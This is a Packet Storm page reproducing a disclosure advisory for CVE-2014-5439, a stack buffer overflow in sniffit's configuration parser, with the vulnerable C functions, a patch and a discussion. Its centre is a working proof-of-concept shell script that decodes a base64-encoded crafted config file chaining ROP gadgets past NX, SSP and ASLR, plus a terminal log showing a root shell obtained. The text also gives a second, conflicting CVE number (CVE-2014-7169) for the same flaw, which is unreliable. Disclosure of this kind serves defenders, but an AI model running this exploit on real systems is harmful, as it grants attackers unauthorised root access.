exploit the possibilities

Sniffit Root Shell

Sniffit Root Shell
Posted Nov 27, 2014
Authored by Hector Marco, Ismael Ripoll

A specially-crafted sniffit configuration file can be leveraged to execute code as root.

tags | exploit, root
advisories | CVE-2014-5439
MD5 | 39dc90168b607b2a256340489f35bf4f

Sniffit Root Shell

Change Mirror Download
CVE-2014-5439 - Root shell on Sniffit
Authors: Ismael Ripoll & Hector Marco
CVE: CVE-2014-5439
Dates: July 2014 - Discovered the vulnerability

Description

Sniffit is a packet sniffer and monitoring tool. A bug in sniffit prior to 0.3.7 has been found. The bug is caused by an incorrect implementation of the functions clean_filename() and clean_string() which causes a stack buffer overflow when parsing a configuration file with "long" paths (more than 20 characters).

The attacker can to create a specially-crafted sniffit configuration file, which is able to bypass all three protection mechanisms:

Non-eXecutable bit NX
Stack Smashing Protector SSP
Address Space Layout Randomisation ASLR

And execute arbitrary code with root privileges (the id of the user that launches the sniffit).

The new issue has been assigned CVE-2014-7169.

The presented PoC successfully exploits the vulnerability.


Impact

To use the sniffit, the application need to be executed with root privileges. Typically by sudo or pkexec or setting the UID bit. Since this tool requires this privilege to execute the sniffer, only allowing to a user execute the sniffer is enough to execute commands as root.



Vulnerable packages

The sniffit 0.3.7 and prior are affected. Currently, this tool is in the universe repository installable via apt-get install sniffit. For example, the sniffit is available on Ubuntu 14.04.1 LTS and prior.



Vulnerability

The vulnerability is caused due to incorrect implementation of the functions clean_filename() and clean_string(). These functions suffer from a stack buffer overflow.

The bug appears in file sn_cfgfile.c on the following functions:

char *clean_string (char *string) {
char help[20];
int i, j;
j=0;
for (i=0;i<strlen(string);i++) {
if( (isalnum(string[i]))||(string[i]=='.') ) {
help[j]=string[i];
help[j+1]=0;
}
j++;
}
strcpy(string, help);
return string;
}

char *clean_filename (char *string) {
char help[20];
int i, j;
j=0;
for (i=0;i<strlen(string);i++) {
if( !(iscntrl(string[i])) && !(isspace(string[i])) ) {
help[j]=string[i];
help[j+1]=0;
}
j++;
}
strcpy(string, help);
return string;
}




Exploit (PoC)

I have built an exploit to bypass the three most popular protections techniques: Non-eXecutable bit NX, Stack Smashing Protector SSP and Address Space Layout Randomisation ASLR. The exploit finally obtains a root shell. The exploit was successfully tested with Ubuntu 14.04.1 LTS (trusty) with kernel 3.13.0-32-generic (x86_64) fully updated.

The sniffit exploit is a shell script which will creates a specially-crafted configuration file "exploit-sniffit-0.3.7-shell.cfg". Passing this configuration file to sniffit through the "-c" option we will obtain a root shell.

---- start exploit-sniffit-0.3.7-shell.sh exploit ----

cfgfile='
bG9nZmlsZSAvL2Jpbi9zaApsb2dmaWxlIIiIiIiIiIiImZmZmZmZmZmqqqqqqqqqqgYGBgYGBgYG
QUFBQUFBQUEHBwcHBwcHB0NDQ0NDQ0NDRERERERERERFRUVFRUVFRUZGRkZGRkZGR0dHR0dHR0dJ
P0AGBgYGBiH8YAYGBgYGKzxABgYGBgYh/GAGBgYGBtWbQAYGBgYGCkV4cGxvaXQgYnkgSGVjdG9y
IE1hcmNvIDxobWFyY29AaG1hcmNvLm9yZz4KaHR0cDovL2htYXJjby5vcmcK'

echo ""
echo "-----------------------=======-------------------------"
echo "----------------=======================----------------"
echo ""
echo " Author: Hector Marco-Gisbert <hmarco@hmarco.org>"
echo " Website: http://hmarco.org"
echo " Comment: Exploit for sniffit <= 0.3.7 (root shell)"
echo ""
echo "----------------=======================----------------"
echo "-----------------------=======-------------------------"
echo ""

echo "[+] Creating crafted configuration file for sniffit ..."
echo "${cfgfile}" | base64 -d > exploit-sniffit-0.3.7-shell.cfg
echo -e "\n[+] File exploit-sniffit-0.3.7-shell.cfg successfully created !"

echo ""
echo "[+] Help:"
echo " If your sniffit is installed with the Set-User-ID then execute:"
echo " $ sniffit -c exploit-sniffit-0.3.7-shell.cfg"
echo ""
echo " If your are allowed to to execute the sniffit with sudo then execute:"
echo " $ sudo sniffit -c exploit-sniffit-0.3.7-shell.cfg"
echo ""

---- end exploit-sniffit-0.3.7-shell.sh exploit ----


Obtaining a root shell:

box@upv.es:~$ id
uid=1000(box) gid=1000(box) groups=1000(box)
box@upv.es:~$ sniffit -c exploit-sniffit-shell.cfg
#
# id
uid=1000(box) gid=1000(box) euid=0(root) groups=1000(box)


FIX

The following is a simple patch which fixes the bug. Patch for sniffit 0.3.7:

diff -Nurp sniffit-0.3.7.beta/sn_cfgfile.c sniffit-0.3.7.beta-mod/sn_cfgfile.c
--- sniffit-0.3.7.beta/sn_cfgfile.c 2014-10-22 19:29:03.000000000 +0200
+++ sniffit-0.3.7.beta-mod/sn_cfgfile.c 2014-10-22 19:29:12.244971893 +0200
@@ -119,6 +119,11 @@ char *clean_string (char *string)
char help[20];
int i, j;

+if(strlen(string) >= 20){
+ fprintf(stderr, "Error: String too long [%s]\n", string);
+ exit(-1);
+}
+
j=0;
for(i=0;i<strlen(string);i++)
{
@@ -138,6 +143,11 @@ char *clean_filename (char *string)
char help[20];
int i, j;

+if(strlen(string) >= 20){
+ fprintf(stderr, "Error: String too long [%s]\n", string);
+ exit(-1);
+}
+
j=0;
for(i=0;i<strlen(string);i++)
{

[ sniffit-0.3.7-stack-buffer-overflow.patch ]

Patching sniffit 0.3.7:

wget http://hmarco.org/bugs/patches/sniffit-0.3.7-stack-buffer-overflow.patch
cd sniffit-0.3.7
patch -p1 < ../sniffit-0.3.7-stack-buffer-overflow.patch


Discussion

It is hard to understand why the sniffit is still under Ubuntu universe repository, which is easily installable via apt-get install sniffit. The functions clean_string and clean_filename contain two stack buffer overflows which allow to bypass the Stack Smashing Protector (SSP) very easy and build a sequence of ROP gadgets which finally obtains a root shell.

On the other hand, it seems that the code of sniffit is no longer maintained, and may contain additional security issues. Therefore, it is very recommend to not use the sniffit at all for the sake of your security.

Hector Marco - http://hmarco.org
Login or Register to add favorites

File Archive:

August 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    3 Files
  • 2
    Aug 2nd
    2 Files
  • 3
    Aug 3rd
    32 Files
  • 4
    Aug 4th
    22 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    6 Files
  • 8
    Aug 8th
    1 Files
  • 9
    Aug 9th
    2 Files
  • 10
    Aug 10th
    27 Files
  • 11
    Aug 11th
    11 Files
  • 12
    Aug 12th
    11 Files
  • 13
    Aug 13th
    17 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close